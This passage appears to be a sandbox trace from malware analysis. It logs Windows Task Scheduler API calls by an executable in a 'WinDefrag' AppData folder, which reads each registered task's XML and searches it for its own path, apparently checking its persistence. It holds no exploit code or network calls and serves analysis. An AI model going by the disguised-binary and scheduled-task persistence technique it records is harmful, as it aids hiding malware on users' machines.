Path=\"Application\">*[System[Provider[@Name='LocationNotifications'] and EventID=1]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotifications.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.910] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.910] IUnknown:Release (This=0x456b40) returned 0x0 [0258.910] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0258.912] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0258.912] IUnknown:Release (This=0x456b40) returned 0x0 [0258.912] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0258.912] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0258.912] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0258.913] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0258.913] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0258.913] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="WinSAT") returned 0x0 [0258.914] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n 2008-02-25T19:15:00\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n A9A33436-678B-4c9c-A211-7CC38785E79D\r\n \r\n \r\n \r\n \r\n true\r\n \r\n true\r\n false\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n") returned 0x0 [0258.916] StrStrIW (lpFirst="\r\n\r\n \r\n 2008-02-25T19:15:00\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n A9A33436-678B-4c9c-A211-7CC38785E79D\r\n \r\n \r\n \r\n \r\n true\r\n \r\n true\r\n false\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.948] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.948] IUnknown:Release (This=0x456b40) returned 0x0 [0258.948] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0258.949] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0258.949] IUnknown:Release (This=0x456b40) returned 0x0 [0258.949] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0258.949] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0258.950] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0258.967] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=21) returned 0x0 [0258.967] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0258.967] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="ActivateWindowsSearch") returned 0x0 [0258.967] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ActivateWindowsSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoActivateWindowsSearch\r\n \r\n \r\n") returned 0x0 [0258.969] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ActivateWindowsSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoActivateWindowsSearch\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.997] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.997] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0258.997] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="ConfigureInternetTimeService") returned 0x0 [0258.997] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoConfigureInternetTimeService\r\n \r\n \r\n") returned 0x0 [0258.999] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoConfigureInternetTimeService\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.034] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.034] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.035] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="DispatchRecoveryTasks") returned 0x0 [0259.035] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n true\r\n Parallel\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRecoveryTasks $(Arg0)\r\n \r\n \r\n") returned 0x0 [0259.037] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n true\r\n Parallel\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRecoveryTasks $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.067] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.067] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.067] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="ehDRMInit") returned 0x0 [0259.067] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ehDRMInit\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DRMInit\r\n \r\n \r\n") returned 0x0 [0259.070] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ehDRMInit\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DRMInit\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.096] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.096] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.096] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="InstallPlayReady") returned 0x0 [0259.096] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\InstallPlayReady\r\n 2008-02-08T15:02:27.7076832\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /InstallPlayReady $(Arg0)\r\n \r\n \r\n") returned 0x0 [0259.099] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\InstallPlayReady\r\n 2008-02-08T15:02:27.7076832\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /InstallPlayReady $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.126] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.126] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.126] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="mcupdate") returned 0x0 [0259.126] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\mcupdate\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-125)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-126)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate\r\n $(Arg0)\r\n \r\n \r\n") returned 0x0 [0259.128] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\mcupdate\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-125)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-126)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate\r\n $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.174] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.174] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.174] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="MediaCenterRecoveryTask") returned 0x0 [0259.174] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-137)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-138)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -MediaCenterRecoveryTask\r\n \r\n \r\n {23E5D772-327A-42f5-BDEE-C65C6796BB2A}\r\n \r\n \r\n \r\n") returned 0x0 [0259.177] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-137)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-138)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -MediaCenterRecoveryTask\r\n \r\n \r\n {23E5D772-327A-42f5-BDEE-C65C6796BB2A}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.210] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.210] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.210] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="ObjectStoreRecoveryTask") returned 0x0 [0259.210] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-131)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-132)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -ObjectStoreRecoveryTask\r\n \r\n \r\n {177AFECE-9599-46cf-90D7-68EC9EEB27B4}\r\n \r\n \r\n \r\n") returned 0x0 [0259.213] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-131)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-132)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -ObjectStoreRecoveryTask\r\n \r\n \r\n {177AFECE-9599-46cf-90D7-68EC9EEB27B4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.247] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.247] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.247] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="OCURActivate") returned 0x0 [0259.247] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURActivate\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURActivate\r\n \r\n \r\n") returned 0x0 [0259.249] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURActivate\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURActivate\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.277] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.277] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.277] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="OCURDiscovery") returned 0x0 [0259.277] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURDiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURDiscovery $(Arg0)\r\n \r\n \r\n") returned 0x0 [0259.279] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURDiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURDiscovery $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.305] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.305] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.305] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="PBDADiscovery") returned 0x0 [0259.305] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0259.307] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0259.333] IUnknown:Release (This=0x457fd0) returned 0x0 [0259.333] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0259.333] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: 